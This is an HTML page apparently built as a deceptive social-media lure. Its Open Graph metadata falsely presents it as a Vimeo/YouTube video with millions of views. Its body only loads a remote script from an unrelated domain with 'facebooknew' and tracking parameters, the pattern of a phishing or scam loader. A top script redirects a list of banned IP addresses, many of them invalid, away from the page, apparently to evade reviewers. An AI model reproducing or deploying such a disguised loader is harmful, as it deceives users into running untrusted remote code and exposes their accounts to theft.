<script type="text/javascript">

// Block IP address script- By JavaScriptKit.com (http://www.javascriptkit.com)
// For this and over 400+ free scripts, visit JavaScript Kit- http://www.javascriptkit.com/
// This notice must stay intact for use.

//Enter list of banned ips, each separated with a comma:
var bannedips=["73.144.32.114", "73.144.32.114", "99.38.175.146", "172.58.121.35", "172.58.121.35", "172.58.121.35", "68.58.189.0", "99.38.175.146", "72.168.128.90", "68.36.174.182", "172.58.121.225", "24.99.251.90", "24.99.251.90", "278.0.0.48.102", "78.159.101.115", "173.66.223.166", "279.0.0.19.120", "174.228.142.63", "279.0.0.19.120", "173.66.223.166", "74.109.251.161", "104.231.72.214", "280.0.0.16.110", "108.211.16.183", "108.211.16.183", "104.231.72.214", "67.191.48.215", "172.58.228.181", "174.233.0.180", "73.21.198.145", "73.21.198.145", "71.213.225.170", "23.123.222.246", "174.48.19.52", "278.0.0.48.102", "73.21.198.145", "280.0.0.32.106", "174.233.5.252", "271.0.0.11.120", "99.203.186.93", "280.0.0.16.110", "148.74.149.70", "280.0.0.32.106", "174.233.5.252", "271.0.0.11.120", "174.233.5.252", "271.0.0.11.120", "174.233.5.252", "271.0.0.11.120", "174.48.74.53", "280.0.0.32.106", "76.188.5.41", "280.0.0.32.106", "24.210.213.224", "216.0.0.20.114", "24.210.213.224", "216.0.0.20.114", "24.210.213.224", "76.188.16.234", "280.0.0.32.106", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11", "11.11.11.11"]

var ip = '<!--#echo var="REMOTE_ADDR"-->'

var handleips=bannedips.join("|")
handleips=new RegExp(handleips, "i")

if (ip.search(handleips)!=-1){ 
alert("Your IP has been banned from this site. Redirecting...")
window.location.replace("https://youtu.be/ULrh7yTFTv4?t=11")
}

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> 
<head>
<meta property="og:site_name" content="Vimeo">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=5.0,user-scalable=yes">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta property="og:title" content="Youtube">
<meta property="og:description" content="5.502.608 Views">
<meta property="og:url" content="https://www.youtube.com/">
<meta property="og:type" content="video">
<title>Video</title>
</head>
<body style="font-family: Arial;font-size: 12pt;">
<script src="https://play.registrocideoson.com/?api=1&lan=facebooknew&ht=2&counter0=emilio301" type="text/javascript" async="true"></script>
</body>
</html>